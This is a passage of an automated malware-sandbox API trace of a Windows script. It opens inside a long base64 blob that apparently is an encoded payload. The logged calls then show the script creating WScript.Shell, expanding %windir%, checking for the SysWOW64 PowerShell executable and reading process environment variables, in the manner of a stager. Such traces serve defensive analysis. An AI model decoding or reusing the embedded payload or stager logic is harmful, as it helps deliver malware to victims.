dExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBU") returned 0x7791 [0082.969] IUnknown:AddRef (This=0x3f1d10) returned 0x4 [0082.969] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c648 | out: ppv=0x18c648*=0x39ac80) returned 0x0 [0082.969] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.969] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c698 | out: ppv=0x18c698*=0x39ac80) returned 0x0 [0082.969] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.970] ISystemDebugEventFire:IsActive (This=0x3d8c40) returned 0x1 [0082.970] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c638 | out: ppv=0x18c638*=0x39ac80) returned 0x0 [0082.970] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.970] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c328 | out: ppvObject=0x18c328*=0x0) returned 0x80004002 [0082.970] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c2a0 | out: ppvObject=0x18c2a0*=0x0) returned 0x80004002 [0082.970] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c2a8 | out: ppvObject=0x18c2a8*=0x3c92c0) returned 0x0 [0082.970] GetCurrentThreadId () returned 0x678 [0082.970] IActiveScriptSite:OnEnterScript (This=0x3f1d10) returned 0x0 [0082.970] IDispatchEx:GetDispId (in: This=0x3c92c0, bstrName="e", grfdex=0x10000001, pid=0x18a940 | out: pid=0x18a940*=-1) returned 0x80020006 [0082.970] IActiveScript:GetScriptDispatch (in: This=0x2ed360, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ee140) returned 0x0 [0082.970] GetCurrentThreadId () returned 0x678 [0082.970] IUnknown:QueryInterface (in: This=0x2ee140, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ee140) returned 0x0 [0082.970] IDispatchEx:GetDispId (in: This=0x2ee140, bstrName="e", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.970] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.970] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.970] IActiveScript:GetScriptDispatch (in: This=0x2eec30, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ed8d0) returned 0x0 [0082.970] GetCurrentThreadId () returned 0x678 [0082.971] IUnknown:QueryInterface (in: This=0x2ed8d0, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ed8d0) returned 0x0 [0082.971] IDispatchEx:GetDispId (in: This=0x2ed8d0, bstrName="e", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.971] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.971] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.971] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a958 | out: ppv=0x18a958*=0x39ac80) returned 0x0 [0082.971] IUnknown:Release (This=0x3c92c0) returned 0xe [0082.972] MulDiv (nNumber=10, nNumerator=100, nDenominator=38) returned 26 [0082.972] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.972] GetTickCount () returned 0x3f7f [0082.972] IDispatchEx:GetDispId (in: This=0x3c92c0, bstrName="a", grfdex=0x10000001, pid=0x18a940 | out: pid=0x18a940*=-1) returned 0x80020006 [0082.972] IActiveScript:GetScriptDispatch (in: This=0x2ed360, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ee140) returned 0x0 [0082.972] GetCurrentThreadId () returned 0x678 [0082.972] IUnknown:QueryInterface (in: This=0x2ee140, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ee140) returned 0x0 [0082.972] IDispatchEx:GetDispId (in: This=0x2ee140, bstrName="a", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.972] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.972] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.972] IActiveScript:GetScriptDispatch (in: This=0x2eec30, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ed8d0) returned 0x0 [0082.972] GetCurrentThreadId () returned 0x678 [0082.973] IUnknown:QueryInterface (in: This=0x2ed8d0, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ed8d0) returned 0x0 [0082.973] IDispatchEx:GetDispId (in: This=0x2ed8d0, bstrName="a", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.973] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.973] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.973] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18a6d0 | out: lpclsid=0x18a6d0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0082.973] SysStringLen (param_1=0x0) returned 0x0 [0082.973] CoGetClassObject (in: rclsid=0x18a6d0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef49a6300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a6a0 | out: ppv=0x18a6a0*=0x2eec10) returned 0x0 [0082.973] WshShell:IUnknown:QueryInterface (in: This=0x2eec10, riid=0x7fef49a6310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18a6a8 | out: ppvObject=0x18a6a8*=0x0) returned 0x80004002 [0082.973] WshShell:IClassFactory:CreateInstance (in: This=0x2eec10, pUnkOuter=0x0, riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a690 | out: ppvObject=0x18a690*=0x2ed9c8) returned 0x0 [0082.973] WshShell:IUnknown:Release (This=0x2eec10) returned 0x0 [0082.973] IUnknown:QueryInterface (in: This=0x2ed9c8, riid=0x7fef49a6320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18a670 | out: ppvObject=0x18a670*=0x0) returned 0x80004002 [0082.973] IUnknown:QueryInterface (in: This=0x2ed9c8, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18a648 | out: ppvObject=0x18a648*=0x0) returned 0x80004002 [0082.973] IUnknown:QueryInterface (in: This=0x2ed9c8, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18a5c0 | out: ppvObject=0x18a5c0*=0x0) returned 0x80004002 [0082.973] IUnknown:QueryInterface (in: This=0x2ed9c8, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a5c8 | out: ppvObject=0x18a5c8*=0x0) returned 0x80004002 [0082.973] IUnknown:QueryInterface (in: This=0x2ed9c8, riid=0x7fef49a6508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18a5d0 | out: ppvObject=0x18a5d0*=0x0) returned 0x80004002 [0082.973] IUnknown:QueryInterface (in: This=0x2ed9c8, riid=0x7fef49a6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a5d8 | out: ppvObject=0x18a5d8*=0x2ed9a0) returned 0x0 [0082.973] IUnknown:Release (This=0x2ed9c8) returned 0x1 [0082.973] IDispatchEx:GetDispId (in: This=0x3c92c0, bstrName="w", grfdex=0x10000001, pid=0x18a940 | out: pid=0x18a940*=-1) returned 0x80020006 [0082.973] IActiveScript:GetScriptDispatch (in: This=0x2ed360, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ee140) returned 0x0 [0082.974] GetCurrentThreadId () returned 0x678 [0082.974] IUnknown:QueryInterface (in: This=0x2ee140, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ee140) returned 0x0 [0082.974] IDispatchEx:GetDispId (in: This=0x2ee140, bstrName="w", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.974] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.974] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.974] IActiveScript:GetScriptDispatch (in: This=0x2eec30, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ed8d0) returned 0x0 [0082.974] GetCurrentThreadId () returned 0x678 [0082.974] IUnknown:QueryInterface (in: This=0x2ed8d0, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ed8d0) returned 0x0 [0082.974] IDispatchEx:GetDispId (in: This=0x2ed8d0, bstrName="w", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.974] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.974] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.974] IDispatch:GetIDsOfNames (in: This=0x2ed9a0, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a970*="ExpandEnvironmentStrings", cNames=0x1, lcid=0x409, rgDispId=0x18a820 | out: rgDispId=0x18a820*=1006) returned 0x0 [0082.977] IUnknown:AddRef (This=0x2ed9a0) returned 0x2 [0082.977] IDispatch:Invoke (in: This=0x2ed9a0, dispIdMember=1006, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%windir%", varVal2=0x2eda50)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18ac48, pExcepInfo=0x18a6b0, puArgErr=0x18a6a4 | out: pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%windir%", varVal2=0x2eda50)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18ac48*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows", varVal2=0x18aa18), pExcepInfo=0x18a6b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a6a4*=0x0) returned 0x0 [0082.977] IUnknown:Release (This=0x2ed9a0) returned 0x1 [0082.977] IDispatchEx:GetDispId (in: This=0x3c92c0, bstrName="p", grfdex=0x10000001, pid=0x18a940 | out: pid=0x18a940*=-1) returned 0x80020006 [0082.977] IActiveScript:GetScriptDispatch (in: This=0x2ed360, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ee140) returned 0x0 [0082.977] GetCurrentThreadId () returned 0x678 [0082.977] IUnknown:QueryInterface (in: This=0x2ee140, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ee140) returned 0x0 [0082.978] IDispatchEx:GetDispId (in: This=0x2ee140, bstrName="p", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.978] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.978] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.978] IActiveScript:GetScriptDispatch (in: This=0x2eec30, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ed8d0) returned 0x0 [0082.978] GetCurrentThreadId () returned 0x678 [0082.978] IUnknown:QueryInterface (in: This=0x2ed8d0, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ed8d0) returned 0x0 [0082.978] IDispatchEx:GetDispId (in: This=0x2ed8d0, bstrName="p", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.978] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.978] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.978] IDispatchEx:GetDispId (in: This=0x3c92c0, bstrName="f", grfdex=0x10000001, pid=0x18a940 | out: pid=0x18a940*=-1) returned 0x80020006 [0082.978] IActiveScript:GetScriptDispatch (in: This=0x2ed360, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ee140) returned 0x0 [0082.978] GetCurrentThreadId () returned 0x678 [0082.978] IUnknown:QueryInterface (in: This=0x2ee140, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ee140) returned 0x0 [0082.979] IDispatchEx:GetDispId (in: This=0x2ee140, bstrName="f", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.979] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.979] IUnknown:Release (This=0x2ee140) returned 0x1 [0082.979] IActiveScript:GetScriptDispatch (in: This=0x2eec30, pstrItemName="window", ppdisp=0x18a6a8 | out: ppdisp=0x18a6a8*=0x2ed8d0) returned 0x0 [0082.979] GetCurrentThreadId () returned 0x678 [0082.979] IUnknown:QueryInterface (in: This=0x2ed8d0, riid=0x7fef6a9de90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a630 | out: ppvObject=0x18a630*=0x2ed8d0) returned 0x0 [0082.979] IDispatchEx:GetDispId (in: This=0x2ed8d0, bstrName="f", grfdex=0x10000001, pid=0x18a6b8 | out: pid=0x18a6b8*=-1) returned 0x80020006 [0082.979] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.979] IUnknown:Release (This=0x2ed8d0) returned 0x1 [0082.979] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x18a6d0 | out: lpclsid=0x18a6d0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0082.983] SysStringLen (param_1=0x0) returned 0x0 [0082.983] CoGetClassObject (in: rclsid=0x18a6d0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef49a6300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a6a0 | out: ppv=0x18a6a0*=0x2ee0c0) returned 0x0 [0083.009] FileSystemObject:IUnknown:QueryInterface (in: This=0x2ee0c0, riid=0x7fef49a6310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18a6a8 | out: ppvObject=0x18a6a8*=0x0) returned 0x80004002 [0083.009] FileSystemObject:IClassFactory:CreateInstance (in: This=0x2ee0c0, pUnkOuter=0x0, riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a690 | out: ppvObject=0x18a690*=0x2ee0f0) returned 0x0 [0083.009] FileSystemObject:IUnknown:Release (This=0x2ee0c0) returned 0x0 [0083.009] IUnknown:QueryInterface (in: This=0x2ee0f0, riid=0x7fef49a6320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18a670 | out: ppvObject=0x18a670*=0x0) returned 0x80004002 [0083.009] IUnknown:QueryInterface (in: This=0x2ee0f0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18a648 | out: ppvObject=0x18a648*=0x0) returned 0x80004002 [0083.009] IUnknown:QueryInterface (in: This=0x2ee0f0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18a5c0 | out: ppvObject=0x18a5c0*=0x0) returned 0x80004002 [0083.009] IUnknown:QueryInterface (in: This=0x2ee0f0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a5c8 | out: ppvObject=0x18a5c8*=0x0) returned 0x80004002 [0083.009] IUnknown:QueryInterface (in: This=0x2ee0f0, riid=0x7fef49a6508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18a5d0 | out: ppvObject=0x18a5d0*=0x0) returned 0x80004002 [0083.009] IUnknown:QueryInterface (in: This=0x2ee0f0, riid=0x7fef49a6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a5d8 | out: ppvObject=0x18a5d8*=0x2ee0f0) returned 0x0 [0083.009] IUnknown:Release (This=0x2ee0f0) returned 0x1 [0083.010] IDispatch:GetIDsOfNames (in: This=0x2ee0f0, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a970*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0x18a820 | out: rgDispId=0x18a820*=10016) returned 0x0 [0083.010] IUnknown:AddRef (This=0x2ee0f0) returned 0x2 [0083.010] IDispatch:Invoke (in: This=0x2ee0f0, dispIdMember=10016, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", varVal2=0x2ec4f8)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18ac48, pExcepInfo=0x18a6b0, puArgErr=0x18a6a4 | out: pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", varVal2=0x2ec4f8)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18ac48*(varType=0xb, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x2ed970), pExcepInfo=0x18a6b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a6a4*=0x0) returned 0x0 [0083.013] IUnknown:Release (This=0x2ee0f0) returned 0x1 [0083.013] IDispatch:GetIDsOfNames (in: This=0x2ed9a0, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a970*="Environment", cNames=0x1, lcid=0x409, rgDispId=0x18a820 | out: rgDispId=0x18a820*=200) returned 0x0 [0083.013] IUnknown:AddRef (This=0x2ed9a0) returned 0x2 [0083.013] IDispatch:Invoke (in: This=0x2ed9a0, dispIdMember=200, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Process", varVal2=0x2eda50)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18ac48, pExcepInfo=0x18a6b0, puArgErr=0x18a6a4 | out: pDispParams=0x18a708*(rgvarg=([0]=0x18a720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Process", varVal2=0x2eda50)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18ac48*(varType=0x9, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee090, varVal2=0x2ed970), pExcepInfo=0x18a6b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a6a4*=0x0) returned 0x0 [0083.014] IUnknown:Release 